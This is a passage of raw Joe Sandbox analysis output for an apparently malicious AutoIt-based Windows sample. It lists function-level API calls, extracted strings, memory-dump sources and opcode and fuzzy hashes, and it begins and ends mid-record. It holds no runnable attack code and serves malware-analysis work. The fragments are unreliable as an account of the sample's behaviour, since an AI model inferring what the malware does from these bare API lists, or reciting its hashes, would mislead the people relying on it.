                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                          • String ID: AutoIt3GUI$Container
                                                                                          • API String ID: 3380330463-3941886329
                                                                                          • Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                          • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                          • Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                          • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00409A61
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID: 0vH
                                                                                          • API String ID: 1143807570-3662162768
                                                                                          • Opcode ID: bf773a96792e7386fbbaa0db16cdf7f70de857e2ea7db1c9c90ef838773f5a19
                                                                                          • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                          • Opcode Fuzzy Hash: bf773a96792e7386fbbaa0db16cdf7f70de857e2ea7db1c9c90ef838773f5a19
                                                                                          • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HH$HH
                                                                                          • API String ID: 0-1787419579
                                                                                          • Opcode ID: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                          • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                          • Opcode Fuzzy Hash: fed4e066af51e45fc8c5976399addcc25001bc25a5639efd16b547c1275b717f
                                                                                          • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoItemMenu_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 2223754486-4108050209
                                                                                          • Opcode ID: 60781951bb834b78e0167a3e9afe01c70176745dc522d898366d6ad0e6242f51
                                                                                          • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                          • Opcode Fuzzy Hash: 60781951bb834b78e0167a3e9afe01c70176745dc522d898366d6ad0e6242f51
                                                                                          • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: '
                                                                                          • API String ID: 3850602802-1997036262
                                                                                          • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                          • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                          • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                          • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                          • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                          • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                          • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: Combobox
                                                                                          • API String ID: 3850602802-2096851135
                                                                                          • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                          • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                          • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                          • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                          APIs
                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                          • String ID: edit
                                                                                          • API String ID: 2978978980-2167791130
                                                                                          • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                          • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                          • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                          • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                          • String ID: @
                                                                                          • API String ID: 2783356886-2766056989
                                                                                          • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                          • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                          • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                          • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: htonsinet_addr
                                                                                          • String ID: 255.255.255.255
                                                                                          • API String ID: 3832099526-2422070025
                                                                                          • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                          • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                          • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                          • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 455545452-1403004172
                                                                                          • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                          • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                          • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                          • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                          APIs
                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InternetOpen
                                                                                          • String ID: <local>
                                                                                          • API String ID: 2038078732-4266983199
                                                                                          • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                          • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                          • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                          • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 455545452-1403004172
                                                                                          • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                          • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                          • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                          • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 455545452-1403004172
                                                                                          • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                          • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                          • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                          • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmp
                                                                                          • String ID: ,$UTF8)
                                                                                          • API String ID: 909875538-2632631837
                                                                                          • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                          • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                                          • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                          • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmp
                                                                                          • String ID: ,$UTF8)
                                                                                          • API String ID: 909875538-2632631837
                                                                                          • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                          • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                                          • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                          • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • wsprintfW.USER32 ref: 004560E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_mallocwsprintf
                                                                                          • String ID: %d/%02d/%02d
                                                                                          • API String ID: 1262938277-328681919
                                                                                          • Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                          • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                          • Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                          • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                          APIs
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                            • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 529655941-2988720461
                                                                                          • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                          • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                          • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                          • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                          APIs
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                          • PostMessageW.USER32(00000000), ref: 00442247
                                                                                            • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                          Strings
                                                                                          Memory Dump Source
